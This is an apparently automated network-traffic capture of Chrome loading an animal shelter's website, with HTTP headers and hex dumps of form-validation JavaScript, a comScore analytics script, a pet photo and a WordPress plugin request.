                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 44 45 58 3d 77 69 6e 64 6f 77 2e 54 43 42 5f 50 41 47 45 5f 49 4e 44 45 58 7c 7c 31 2c 74 68 69 73 2e 65 61 63 68 28 28 28 6e 2c 69 29 3d 3e 7b 63 6f 6e 73 74 20 6f 3d 74 28 69 29 3b 6c 65 74 20 73 3d 6f 2e 66 69 6e 64 28 22 66 6f 72 6d 22 29 3b 63 6f 6e 73 74 20 64 3d 73 2e 66 69 6e 64 28 22 2e 74 76 65 2d 66 2d 61 2d 68 69 64 64 65 6e 22 29 2e 76 61 6c 28 29 3b 69 66 28 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 6f 2e 66 69 6e 64 28 22 2e 74 68 72 76 5f 6c 65 61 64 5f 67 65 6e 65 72 61 74 69 6f 6e 5f 63 6f 6e 74 61 69 6e 65 72 22 29 2e 77 72 61 70 49 6e 6e 65 72 28 27 3c 66 6f 72 6d 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 3c 2f 66 6f 72 6d 3e 27 29 2c 73 3d 6f 2e 66 69 6e 64 28 22 66 6f 72 6d 22 29 29 2c 73 2e 66 69 6e 64 28 22 2e 74 76 65 5f 6c
                                                                                                                                                                                                                                                        Data Ascii: DEX=window.TCB_PAGE_INDEX||1,this.each(((n,i)=>{const o=t(i);let s=o.find("form");const d=s.find(".tve-f-a-hidden").val();if(0===s.length&&(o.find(".thrv_lead_generation_container").wrapInner('<form method="post"></form>'),s=o.find("form")),s.find(".tve_l
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 6e 65 72 3d 74 28 27 3c 64 69 76 20 69 64 3d 22 74 76 65 2d 6c 67 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 2f 64 69 76 3e 27 29 2e 70 72 65 70 65 6e 64 54 6f 28 73 2e 70 61 72 65 6e 74 28 29 29 2c 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 74 76 65 2d 6c 67 2d 65 72 72 2d 63 6c 6f 73 65 22 2c 74 2e 70 72 6f 78 79 28 74 68 69 73 2e 63 6c 6f 73 65 2c 74 68 69 73 29 29 29 2c 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 65 6d 70 74 79 28 29 2e 68 69 64 65 28 29 2c 74 68 69 73 2e 63 6c 65 61 72 28 29 7d 2c 63 6c 6f 73 65 28 29 7b 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 66 61 64 65 4f 75 74 28 32 30 30 29 3b 6c 65 74 20 74 3d 73 2e 66 69 6e 64 28 22 2e 22 2b 74 68 69 73 2e 65 72 72 43 6c 61 73 73 29
                                                                                                                                                                                                                                                        Data Ascii: ner=t('<div id="tve-lg-error-container"></div>').prependTo(s.parent()),this.container.on("click",".tve-lg-err-close",t.proxy(this.close,this))),this.container.empty().hide(),this.clear()},close(){this.container.fadeOut(200);let t=s.find("."+this.errClass)
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 72 72 43 6c 61 73 73 29 3a 22 73 74 61 74 65 22 3d 3d 3d 72 26 26 22 6e 6f 2d 73 74 61 74 65 22 3d 3d 3d 61 26 26 74 2e 63 6c 6f 73 65 73 74 28 22 2e 74 76 65 5f 6c 67 5f 73 74 61 74 65 22 29 2e 61 64 64 43 6c 61 73 73 28 74 68 69 73 2e 65 72 72 43 6c 61 73 73 29 7d 22 72 65 71 75 69 72 65 64 22 3d 3d 3d 61 26 26 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 66 69 6e 64 28 22 2e 74 76 65 2d 6c 67 2d 72 65 71 75 69 72 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 61 70 70 65 6e 64 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 76 65 2d 6c 67 2d 65 72 72 2d 69 74 65 6d 20 74 76 65 2d 6c 67 2d 27 2b 61 2b 27 22 3e 27 2b 65 2b 22 3c 2f 64 69 76 3e 22 29 7d 2c 73 68 6f 77 28 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d
                                                                                                                                                                                                                                                        Data Ascii: rrClass):"state"===r&&"no-state"===a&&t.closest(".tve_lg_state").addClass(this.errClass)}"required"===a&&this.container.find(".tve-lg-required").length||this.container.append('<div class="tve-lg-err-item tve-lg-'+a+'">'+e+"</div>")},show(){if("function"==
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 28 65 2c 61 2c 6e 29 2c 72 7d 2c 76 61 6c 69 64 4e 75 6d 62 65 72 28 74 29 7b 63 6f 6e 73 74 20 65 3d 70 61 72 73 65 46 6c 6f 61 74 28 74 2e 61 74 74 72 28 22 6d 61 78 22 29 29 2c 61 3d 70 61 72 73 65 46 6c 6f 61 74 28 74 2e 61 74 74 72 28 22 6d 69 6e 22 29 29 2c 72 3d 70 61 72 73 65 46 6c 6f 61 74 28 74 2e 76 61 6c 28 29 29 2c 6e 3d 74 68 69 73 2e 67 65 74 45 72 72 6f 72 73 28 6f 29 3b 6c 65 74 20 69 3d 21 30 2c 73 3d 6e 2e 6d 69 6e 5f 76 61 6c 75 65 2c 64 3d 6e 2e 6d 61 78 5f 76 61 6c 75 65 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 73 26 26 28 73 3d 22 54 68 65 20 6e 75 6d 62 65 72 20 66 69 65 6c 64 20 73 68 6f 75 6c 64 20 62 65 20 61 74 20 6c 65 61 73 74 20 7b 6d 69 6e 5f 76 61 6c 75 65 7d 22 29 2c 76 6f 69 64 20 30 3d 3d 3d 64 26 26 28 64 3d 22 54 68 65
                                                                                                                                                                                                                                                        Data Ascii: (e,a,n),r},validNumber(t){const e=parseFloat(t.attr("max")),a=parseFloat(t.attr("min")),r=parseFloat(t.val()),n=this.getErrors(o);let i=!0,s=n.min_value,d=n.max_value;if(void 0===s&&(s="The number field should be at least {min_value}"),void 0===d&&(d="The
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 31 2c 33 7d 5c 2e 5b 30 2d 39 5d 7b 31 2c 33 7d 5c 2e 5b 30 2d 39 5d 7b 31 2c 33 7d 5d 29 7c 28 28 5b 61 2d 7a 41 2d 5a 5c 2d 30 2d 39 5d 2b 5c 2e 29 2b 5b 61 2d 7a 41 2d 5a 5d 7b 32 2c 7d 29 29 24 2f 2e 74 65 73 74 28 74 2e 76 61 6c 28 29 29 26 26 28 74 68 69 73 2e 5f 6d 61 72 6b 45 72 72 6f 72 28 74 2c 65 2c 22 65 6d 61 69 6c 22 29 2c 31 29 29 7d 2c 67 65 74 45 72 72 6f 72 73 28 74 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 70 61 72 73 65 28 74 2e 66 69 6e 64 28 22 2e 74 76 65 2d 6c 67 2d 65 72 72 2d 6d 73 67 22 29 2e 76 61 6c 28 29 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 7b 66 69 6c 65 5f 65 78 74 65 6e 73 69 6f 6e 3a 22 53 6f 72 72 79 2c 20 7b 66 69 6c 65 65 78 74 65 6e 73 69 6f 6e 7d 20 66 69 6c 65 73 20 61 72 65 20 6e 6f 74 20
                                                                                                                                                                                                                                                        Data Ascii: 1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/.test(t.val())&&(this._markError(t,e,"email"),1))},getErrors(t){try{return JSON.parse(t.find(".tve-lg-err-msg").val())}catch(t){return{file_extension:"Sorry, {fileextension} files are not
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 65 49 6e 74 28 69 29 29 74 2e 68 69 64 65 28 29 2c 30 3d 3d 3d 72 2e 6c 65 6e 67 74 68 3f 28 61 2e 61 70 70 65 6e 64 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 76 65 2d 65 72 72 6f 72 2d 77 72 61 70 70 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 76 65 2d 65 72 72 6f 72 2d 63 6f 6e 74 65 6e 74 22 3e 3c 2f 64 69 76 3e 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 74 76 65 2d 63 6c 6f 73 65 2d 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 22 3e 52 65 74 72 79 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 27 29 2c 6e 2e 65 72 72 6f 72 3d 6e 2e 65 72 72 6f 72 2e 72 65 70 6c 61 63 65 28 22 5b 6c 65 61 64 5f 65 6d 61 69 6c 5d 22 2c 64 29 2c 6e 2e 65 72 72 6f 72 3d 6e 2e 65 72 72 6f 72 2e 72 65 70 6c 61 63 65 28 22 5b 6c 65 61 64 5f 6e 61 6d 65 5d 22 2c 6f 29 2c
                                                                                                                                                                                                                                                        Data Ascii: eInt(i))t.hide(),0===r.length?(a.append('<div class="tve-error-wrapper"><div class="tve-error-content"></div><button class="tve-close-error-message">Retry</button></div>'),n.error=n.error.replace("[lead_email]",d),n.error=n.error.replace("[lead_name]",o),
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 65 78 74 28 22 53 65 6c 65 63 74 20 43 6f 75 6e 74 72 79 22 29 2c 61 5b 30 5d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 76 61 6c 75 65 22 2c 22 22 29 2c 72 29 61 5b 30 5d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 76 61 6c 75 65 22 2c 72 29 2c 6e 2e 66 69 6e 64 28 22 2e 74 76 65 2d 64 69 73 61 62 6c 65 64 2d 74 65 78 74 2d 69 6e 6e 65 72 22 29 2e 74 65 78 74 28 72 29 3b 65 6c 73 65 20 69 66 28 69 26 26 6f 29 7b 63 6f 6e 73 74 20 74 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 65 2e 61 74 74 72 28 22 64 61 74 61 2d 64 69 73 70 6c 61 79 2d 6c 69 73 74 22 29 29 5b 30 5d 3b 61 5b 30 5d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 76 61 6c 75 65 22 2c 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 6e 61 6d 65 29 2c 6e 2e 66 69 6e 64 28 22 2e 74 76 65 2d 64 69
                                                                                                                                                                                                                                                        Data Ascii: ext("Select Country"),a[0].setAttribute("value",""),r)a[0].setAttribute("value",r),n.find(".tve-disabled-text-inner").text(r);else if(i&&o){const t=JSON.parse(e.attr("data-display-list"))[0];a[0].setAttribute("value",null==t?void 0:t.name),n.find(".tve-di


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        48192.168.2.44980018.244.18.384432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC619OUTGET /beacon.js HTTP/1.1
                                                                                                                                                                                                                                                        Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                        Content-Length: 16665
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Mon, 16 Dec 2024 11:22:14 GMT
                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                                                                        Date: Wed, 08 Jan 2025 11:45:53 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                                                                                        ETag: "c22322b3d030360971584a98c60b6e0b"
                                                                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                        Via: 1.1 354c49ee216d1b8ed995ee7b94d96f10.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                                                                                                                        X-Amz-Cf-Id: Z--dJT9NSaMUGJFCNMP7bswu0PUcURaGINZTJvEwm8JMeeez0Uh5Ug==
                                                                                                                                                                                                                                                        Age: 51200
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC16384INData Raw: 76 61 72 20 43 4f 4d 53 43 4f 52 45 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 74 2c 65 3d 31 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 65 3c 72 3b 65 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 65 5d 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 69 29 26 26 28 6e 5b 69 5d 3d 74 5b 69 5d 29 3b 72 65 74 75 72 6e 20 6e 7d 2c 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66
                                                                                                                                                                                                                                                        Data Ascii: var COMSCORE=function(n){var t=function(){return t=Object.assign||function(n){for(var t,e=1,r=arguments.length;e<r;e++)for(var i in t=arguments[e])Object.prototype.hasOwnProperty.call(t,i)&&(n[i]=t[i]);return n},t.apply(this,arguments)};"function"==typeof
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC281INData Raw: 6e 74 65 67 72 61 74 69 6f 6e 3a 21 30 2c 65 6e 61 62 6c 65 43 6d 70 49 6e 74 65 67 72 61 74 69 6f 6e 3a 21 30 2c 65 6e 61 62 6c 65 46 69 72 73 74 50 61 72 74 79 43 6f 6f 6b 69 65 3a 21 31 2c 62 79 70 61 73 73 55 73 65 72 43 6f 6e 73 65 6e 74 52 65 71 75 69 72 65 6d 65 6e 74 46 6f 72 31 50 43 6f 6f 6b 69 65 3a 21 31 2c 65 6e 61 62 6c 65 44 6f 63 75 6d 65 6e 74 55 72 6c 43 6f 6c 6c 65 63 74 69 6f 6e 3a 21 30 2c 65 6e 61 62 6c 65 44 6f 63 75 6d 65 6e 74 54 69 74 6c 65 43 6f 6c 6c 65 63 74 69 6f 6e 3a 21 30 2c 65 6e 61 62 6c 65 44 6f 63 75 6d 65 6e 74 52 65 66 65 72 72 65 72 43 6f 6c 6c 65 63 74 69 6f 6e 3a 21 30 7d 7d 29 2c 4e 3d 75 28 46 2c 46 2e 65 74 29 2c 42 3d 75 28 46 2c 46 2e 73 74 29 3b 72 65 74 75 72 6e 20 46 2e 66 74 28 29 2c 42 28 29 2c 6e 2e 62
                                                                                                                                                                                                                                                        Data Ascii: ntegration:!0,enableCmpIntegration:!0,enableFirstPartyCookie:!1,bypassUserConsentRequirementFor1PCookie:!1,enableDocumentUrlCollection:!0,enableDocumentTitleCollection:!0,enableDocumentReferrerCollection:!0}}),N=u(F,F.et),B=u(F,F.st);return F.ft(),B(),n.b


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        49192.168.2.44980213.107.246.454432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC388OUTGET /photos/352/dd66daa9-9433-4f14-b223-5ee977a0676b.jpg HTTP/1.1
                                                                                                                                                                                                                                                        Host: g.petango.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC554INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:12 GMT
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Content-Length: 80941
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Jan 2025 02:47:10 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DD2AD7C14F2FC4
                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                        x-ms-request-id: 5cb90a8a-b01e-0001-5c3a-629743000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20250109T015912Z-156796c549bndwlbhC1EWRbq0c000000186g000000004hw9
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC15830INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 0b bc 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 12 01 03 00 01 00 00 00 01 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 0f 01 02 00 06 00 00 00 b6 00 00 00 10 01 02 00 0e 00 00 00 bc 00 00 00 1a 01 05 00 01 00 00 00 ca 00 00 00 1b 01 05 00 01 00 00 00 d2 00 00 00 31 01 02 00 07 00 00 00 da 00 00 00 32 01 02 00 14 00 00 00 e1 00 00 00 3c 01 02 00 0e 00 00 00 f5 00 00 00 1a 01 05 00 01 00 00 00 03 01 00 00 1b 01 05 00 01 00 00 00 0b 01 00 00 69 87 04 00 01 00 00 00 13 01 00 00 25 88 04 00 01 00 00 00 93 0a 00 00 00 00 00 00 41 70 70 6c 65 00 69 50 68 6f 6e 65 20 31 35 20 50 72 6f 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 31 37 2e 36 2e 31 00
                                                                                                                                                                                                                                                        Data Ascii: JFIFHHExifII*(12<i%AppleiPhone 15 ProHH17.6.1
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC16384INData Raw: 1d a2 b3 54 b4 bb d0 69 f4 89 56 e3 54 d3 2c 27 81 2f 6f 21 b6 37 0d b2 11 23 80 5c fa 0a be d0 3b b6 55 36 03 d0 9e f5 f9 fb fb 4a 5c ea 3a 0f 8c f4 af 13 d9 6b 32 db aa c1 24 50 db 3c 99 55 73 ca 38 1d 05 7d 47 fb 3c dd 6b fe 20 fd 9f 74 4d 77 c4 ba 93 6a 1a b5 f2 79 d2 b3 1e 10 1e 8a 3e 83 8a b8 52 4d ea 4c db 4a e7 a5 4d a2 5c dc ee c6 d4 03 b9 35 81 a9 f8 4e 69 2d 8c 4e c8 c8 46 39 15 ea 4b 65 3c 52 99 ed c8 92 11 c3 21 ad 6f 2e ca e2 dd 04 e8 50 8e c0 7f 5a d5 42 26 5c f2 3c bb 45 f8 63 e1 cd 3b c3 d1 4b 79 66 75 0b d9 d7 73 b3 f4 5c f6 1f 4a c7 bc f8 5d e1 c9 a7 63 0c 72 59 12 7e 60 8d c1 af 6b 68 d6 de 12 17 25 41 e3 be 05 66 4e 52 43 ca 6d 23 9e 95 ab 8a b5 86 a6 ef 7b 9c ec b2 c5 1d 84 70 34 42 24 44 09 1e 3b 28 18 15 e7 5e 24 b2 96 e6 16 95 79
                                                                                                                                                                                                                                                        Data Ascii: TiVT,'/o!7#\;U6J\:k2$P<Us8}G<k tMwjy>RMLJM\5Ni-NF9Ke<R!o.PZB&\<Ec;Kyfus\J]crY~`kh%AfNRCm#{p4B$D;(^$y
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC16384INData Raw: 03 06 b9 d9 25 9e 77 74 92 03 20 3f c6 7d 6a 43 7e 24 b2 8d d6 12 d8 fb c5 b9 0b ef f5 ad 4d 39 95 a7 84 10 26 46 e8 0f 40 7d e9 b2 4e 3e fb 44 90 d9 20 89 1b c9 9e 60 65 f9 b0 64 60 7a 7a 9e a7 f3 af 4d f0 86 8f 15 9e 9f 25 e5 da 29 07 97 00 73 bb b2 8c 74 f7 f6 02 ad 58 68 f6 f7 b7 ea 91 39 90 20 f9 d8 1c ac 79 e3 83 eb 5d 19 92 d2 12 b0 c2 81 62 84 90 9b b8 50 47 53 57 08 f5 64 b9 f4 2d c5 1b 4f 7a 27 75 66 65 1f bb 85 57 07 27 d6 ba 31 0a c9 a6 14 53 e5 86 19 da 87 81 5c d4 32 4e b6 a6 70 5b 32 0d a1 c8 c7 7e 70 3d ea 4d 7b 59 87 4a d1 40 b7 60 b8 4c b1 27 9c e2 b4 d0 9b 39 68 87 6a 9a a5 a5 95 98 b4 4d bb f1 f3 2e 79 af 21 d5 b5 6b 9b 9b b2 b0 c8 91 5a 83 86 38 fd 2b c1 fe 22 7c 5d d7 34 af 1d 5a e9 96 36 0c 20 92 13 71 7b 7a 41 2a 8b 9c 04 fa e3 27
                                                                                                                                                                                                                                                        Data Ascii: %wt ?}jC~$M9&F@}N>D `ed`zzM%)stXh9 y]bPGSWd-Oz'ufeW'1S\2Np[2~p=M{YJ@`L'9hjM.y!kZ8+"|]4Z6 q{zA*'
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC16384INData Raw: ab e1 77 23 e2 43 bc 59 e5 5c c8 b0 da da 5e 36 a1 01 dd 6f 3c 80 a3 6e ec 06 4d 33 c3 3f 10 6f a6 f1 34 9a 76 ab a6 9b 2d 5e da 1c 17 62 09 b8 03 aa b6 e3 cf 1e f5 e8 f7 96 6b aa e9 90 de 0f 31 e5 1c 1c c4 22 90 fb e3 b6 2b cc b5 4d 1e d6 db c5 03 54 bb d3 51 6d a0 88 86 f3 a5 22 35 3f de 66 e0 9f a0 aa 71 77 e6 41 17 a5 99 e8 76 77 ba 06 b1 60 b7 d0 dd 5b d8 6f 24 3c 20 8e 18 75 cd 5a f2 74 6f fa 0b c1 fa 57 97 e9 f7 76 12 e9 c2 4b 4d 62 d2 c6 26 62 4c 5f 67 24 67 d4 1c 1c 83 c7 35 7b cf 8b fe 86 4b 4f fc 06 3f fc 4d 6d 19 bb 18 c9 2b 9c 95 b7 89 6e 35 4f 81 c6 fa 1d 1d ae ff 00 d3 0d bd e6 99 71 1e 37 c6 5c af 07 b1 1d 7f 0a ef 67 85 74 ef 87 a1 96 db fb 3e 7d f8 82 1d dc a8 ec 2b 9f b7 8d ef 2e 34 f6 86 65 b5 47 41 73 24 6a 36 96 39 ee 3d c1 a5 bd b5
                                                                                                                                                                                                                                                        Data Ascii: w#CY\^6o<nM3?o4v-^bk1"+MTQm"5?fqwAvw`[o$< uZtoWvKMb&bL_g$g5{KO?Mm+n5Oq7\gt>}+.4eGAs$j69=
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC15959INData Raw: f5 ae da 48 b5 16 f0 ec 6c 61 b7 bd b5 b3 b7 fb 62 79 93 18 77 bb 9c 06 2d 8c 90 83 3c 0a 9e 4b 6e 70 ce a7 33 b2 3b 2d 3c 78 a3 fb 1e 03 e5 59 69 50 95 cc 16 92 59 8b 89 22 4e c1 df 3c b7 ae 2a e6 3c 4d ff 00 3f 76 1f f8 28 5a af a7 eb da 7a 68 f0 2d d6 a5 0b 4f b7 e6 f2 ae f6 28 f6 c0 56 fd 4e 6a ef fc 24 1a 3f fd 04 47 fe 07 b7 ff 00 1b ad a2 95 b7 30 77 be c7 cb 37 be 63 7c 43 bd 5d 32 05 9a 4b db 05 06 29 0e 62 9c 0e 07 07 a3 03 80 7e b5 87 e1 5d 0b 51 b3 d1 b5 0f 11 05 7b 7d 72 da 19 6d 34 d8 24 7d f6 f2 03 96 2a 3f ba 0e 70 57 b1 5c 8a dd bb 6b 43 0e 9d a8 41 70 37 cf 1a 5c 44 cc 71 f7 f1 c6 7b 1d c0 8a ba 21 8f c3 17 fa ec b6 da 8b c5 a5 6b 76 f2 5e 2d 8d c2 ee 16 d7 28 9b f7 46 7b 06 19 04 7a e2 b9 ec 8e ae 6e 88 e6 34 2d 40 f8 97 c1 fa be ab a3
                                                                                                                                                                                                                                                        Data Ascii: Hlabyw-<Knp3;-<xYiPY"N<*<M?v(Zzh-O(VNj$?G0w7c|C]2K)b~]Q{}rm4$}*?pW\kCAp7\Dq{!kv^-(F{zn4-@


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        50192.168.2.449804192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC443OUTGET /wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.2.4 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC670INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:12 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 1590
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Fri, 13 Sep 2024 18:47:23 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca HIT
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
